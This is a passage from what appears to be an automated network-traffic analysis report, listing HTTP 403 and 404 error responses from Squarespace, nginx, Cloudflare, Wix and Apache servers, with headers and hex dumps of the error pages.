61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:19 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BU72eXkdK3xxNThjMDc0ZTBkZThiYjQ0YmY1NzVjYmFlYjBjNTQz;Path=/X-Contextid: jhddg0JM/CgmDemGDData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:20 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:07:37 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ko%2BmkNAxbPBhFVZo7E38wdk1XqstGMEPWYM9avQtV5bRv1FkcjNHxuM5PNpR%2FuS3%2BnzGt0yXxzSek3T49fBcEu83uNXPOBHAwN4IspdQ%2Fl8WAAuMoT1kG47rtT2x"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d63dab5364b-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 119e<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equi
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:22 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:24 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 318Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:24 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BCsO010lm8cfBFYjvyh3uvb%2BWnE5nb2XoUShFJIWIAVtX1DcqpW6wa4gR%2FL1mGNdCva%2BY%2B1SJefLDUwipkY0C7qVHdjO99Y%2FwnUNu5Cl1y%2FhsbuuMMsMCwp6kh03ITSx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d738e27bc03-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:24 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WG7EipynGs0H%2BbSI9IbhsTEU6E1YBdF8HqVwvQqStKc%2F5vvRQQpQxQ3i6kAs9YQWb5vhQleTw9sCcKY0Ktu8%2BRwACjeA9MasIKVt6iTxo%2BgzfxMVNiaUg1erFYeEJ5U8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d747fa8bc03-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:24 GMTContent-Type: text/html;charset=utf8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingSet-Cookie: 4b91bab64185417e705f062d95a43eef=311841e7a41c3dba3a2cd9dc41f5fed1;Cache-Control: no-cacheData Raw: 38 65 0d 0a 3c 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e6 a3 80 e6 b5 8b e4 b8 ad 3c 2f 74 69 74 6c 65 3e 3c 64 69 76 3e e8 b7 b3 e8 bd ac e4 b8 ad 3c 2f 64 69 76 3e 3c 2f 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 22 2f 3f 62 74 77 61 66 3d 38 39 30 34 35 32 33 22 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 8e<html><meta charset="utf-8" /><title></title><div></div></html><script> window.location.href ="/?btwaf=8904523"; </script>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1688537244.93111949199216898X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Wed, 05 Jul 2023 06:07:24 GMTX-Served-By: cache-mxp6941-MXPX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIIh/6vGBAHPt/JPHbOvpR4F,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:24 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 